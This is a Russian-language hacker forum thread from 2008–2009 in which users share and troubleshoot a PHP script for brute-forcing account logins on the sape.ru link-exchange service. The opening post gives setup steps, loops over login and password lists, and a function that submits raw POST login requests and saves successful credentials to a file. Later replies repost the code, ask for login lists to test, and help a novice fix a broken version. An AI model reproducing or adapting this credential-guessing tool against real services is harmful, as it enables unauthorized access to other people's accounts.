Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   PHP, PERL, MySQL, JavaScript (https://forum.antichat.xyz/forumdisplay.php?f=37)
-   -   Брут sape (https://forum.antichat.xyz/showthread.php?t=72892)

-Hormold- 07.06.2008 00:20

Брут sape
 
Посмотрел тему про begun и вспомнил что писал брут sape ;)
Жалко без потоков и медленно...

1.Заливаем файл на хост.
2.Создаём pass.txt,good.txt,login.txt с chmod 777!
3.Заполяем нужные файлы и включаем брут!

Что бы брутить логины к паролю:
PHP код:

$login=file("login.txt");
$pass="qwerty";
for(
$i=0;$i<count($login);$i++){
$login[$i]=trim($login[$i]);
if(
login($login[$i],$pass)){$fp=fopen('good.txt','ab');fwrite($fp,$login[$i].':'.$pass."\r");fclose($fp);}


Что бы брутить пароли к логину:
PHP код:

$login="admin";
$pass=file("pass.txt");
for(
$i=0;$i<count($pass);$i++){
$pass[$i]=trim($pass[$i]);
if(
login($login,$pass[$i])){$fp=fopen('good.txt','ab');fwrite($fp,$login.':'.$pass[$i]."\r");fclose($fp);echo "password found!! this is ".$pass[$i];exit();}


Сама функция проверки:
PHP код:


function login($login,$pass){
$data "act=login&login=$login&passwd=$pass";
$len strlen($data);
$re "POST http://sape.ru/login.php HTTP/1.0\nHost: sape.ru\n".
         
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b1; Windows NT 5.1; SV1; .NET CLR 1.1.4322)\nKeep-Alive: 300\n".
         
"Connection: keep-alive\nReferer: http://sape.ru/\n".
         
"Content-Type: application/x-www-form-urlencoded\n".
         
"Content-Length: $len\n\n$data";

$fp fsockopen("sape.ru"80$errno$errstr30);
fwrite($fp$re);
  
$he="";
    while (!
feof($fp)) {
        
$he.=fgets($fp10240);
    }
    
fclose($fp);
    if ( 
preg_match ("/Ошибка/i" "$he")) { $debug=0;$re=false;}
    elseif ( 
preg_match ("/sites.php/i" "$he")) {$debug=1$re=true;}
    

return 
$re;


P.S. За то что вы делаете , автор не отвечает. Написанно только для вспоминания пароля.

mad_xakep 07.06.2008 11:15

а мож выложить список возможных логинов ну че нить подобное, я протестить хочу

XAOCX 08.05.2009 12:57

function login($login,$pass){ $data = "act=login&login=$login&passwd=$pass"; $len = strlen($data); $re = "POST http://sape.ru/login.php HTTP/1.0\nHost: sape.ru\n". "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b1; Windows NT 5.1; SV1; .NET CLR 1.1.4322)\nKeep-Alive: 300\n". "Connection: keep-alive\nReferer: http://sape.ru/\n". "Content-Type: application/x-www-form-urlencoded\n". "Content-Length: $len\n\n$data"; $fp = fsockopen("sape.ru", 80, $errno, $errstr, 30); fwrite($fp, $re); $he=""; while (!feof($fp)) { $he.=fgets($fp, 10240); } fclose($fp); if ( preg_match ("/Ошибка/i" , "$he")) { $debug=0;$re=false;} elseif ( preg_match ("/sites.php/i" , "$he")) {$debug=1; $re=true;} return $re; } $login=file("login.txt"); $pass="qwerty"; for($i=0;$i<count($login);$i++){ $login[$i]=trim($login[$i]); if(login($login[$i],$pass)){$fp=fopen('good.txt','ab');fwrite($fp,$lo gin[$i].':'.$pass."\r");fclose($fp);} }






Вот что показывает

inlanger 08.05.2009 13:24

ну ты хотя бы <? ?> поставь )

XAOCX 08.05.2009 13:38

И что ?

art2222 08.05.2009 16:09

Цитата:

И что ?
И не будет так показывать =\

DDoSька 08.05.2009 16:59

Цитата:

Сообщение от XAOCX
И что ?

Такой гордый. Грин наверно :(

iron-viper 08.05.2009 17:45

lol моя в дауне с таких "И что?" xD
как поет Noize MC "...спиздил дома рубль, а крику будто выставил обменник..."

DDoSька +

wildshaman 08.05.2009 17:47

Давайте теперь каждый, кто начится курлу, выкладывать по элементарному бруту к какому-нибудь сайту?

inlanger 08.05.2009 17:50

А почему бы и нет?

wildshaman 08.05.2009 17:51

Цитата:

Сообщение от inlanger
А почему бы и нет?

А смысл? имхо одна функция - не скрипт...

inlanger 08.05.2009 17:58

Для тех, кто учится - скрипт, да ещё какой!

wildshaman 08.05.2009 18:04

Цитата:

Сообщение от inlanger
Для тех, кто учится - скрипт, да ещё какой!

ну так кидать такое в "Полезные скрипты", а не делать отдельный топик :)

mr.The 08.05.2009 18:33

вы ниразу не археологи, не =\

Sharky 09.05.2009 16:16

Цитата:

Сообщение от wildshaman
Давайте теперь каждый, кто начится курлу, выкладывать по элементарному бруту к какому-нибудь сайту?

а теперь покажи мне тут курл умник :) кто-то выучил умные слова и не отличает курл от сокетов? ооооооой какие мы умные

wildshaman 09.05.2009 16:21

Цитата:

Сообщение от Sharky
а теперь покажи мне тут курл умник :) кто-то выучил умные слова и не отличает курл от сокетов? ооооооой какие мы умные


я особо не рассматривал, сначала показалася реально curl :)
ну сокеты, одна муть )

XAOCX 12.05.2009 13:32

"И что ?" - озночает то что не получилось =)

Помогите пожалуйста сделать под "Что бы брутить пароли к логину"

Tigger 12.05.2009 14:14

Цитата:

Сообщение от XAOCX
"И что ?" - озночает то что не получилось =)

Помогите пожалуйста сделать под "Что бы брутить пароли к логину"


<?php
сам скрипт
?>

XAOCX 12.05.2009 14:30

<?php
function login($login,$pass){
$data = "act=login&login=$login&passwd=$pass";
$len = strlen($data);
$re = "POST http://sape.ru/login.php HTTP/1.0\nHost: sape.ru\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b1; Windows NT 5.1; SV1; .NET CLR 1.1.4322)\nKeep-Alive: 300\n".
"Connection: keep-alive\nReferer: http://sape.ru/\n".
"Content-Type: application/x-www-form-urlencoded\n".
"Content-Length: $len\n\n$data";

$fp = fsockopen("sape.ru", 80, $errno, $errstr, 30);
fwrite($fp, $re);
$he="";
while (!feof($fp)) {
$he.=fgets($fp, 10240);
}
fclose($fp);
if ( preg_match ("/Ошибка/i" , "$he")) { $debug=0;$re=false;}
elseif ( preg_match ("/sites.php/i" , "$he")) {$debug=1; $re=true;}

$login="???";
$pass=file("pass.txt");
for($i=0;$i<count($pass);$i++){
$pass[$i]=trim($pass[$i]);
if(login($login,$pass[$i])){$fp=fopen('good.txt','ab');fwrite($fp,$login.': '.$pass[$i]."\r");fclose($fp);echo "password found!! this is ".$pass[$i];exit();}
}

return $re;
}

?>

Так ?

Ru}{eeZ 12.05.2009 15:50

Цитата:

Сообщение от iron-viper
lol моя в дауне с таких "И что?" xD
как поет Noize MC "...спиздил дома рубль, а крику будто выставил обменник..."

DDoSька +

Блатняк ;)
п.с. читает))

inlanger 12.05.2009 17:16

Цитата:

Так ?
так. А что делаешь с тем, что написал? Сохраняешь в пхп и запускаешь на сервере?

eLWAux 12.05.2009 17:27

археологи мля..
з.ы.: теперь страничка авторизации находится тут https://auth.sape.ru/login/ а не https://auth.sape.ru/login.php

XAOCX 13.05.2009 07:21

Цитата:

Сообщение от inlanger
так. А что делаешь с тем, что написал? Сохраняешь в пхп и запускаешь на сервере?

Угу,пытаюсь.

Sharky 13.05.2009 11:10

брут не актуален

inlanger 13.05.2009 13:44

Так бы сразу )


Время: 17:09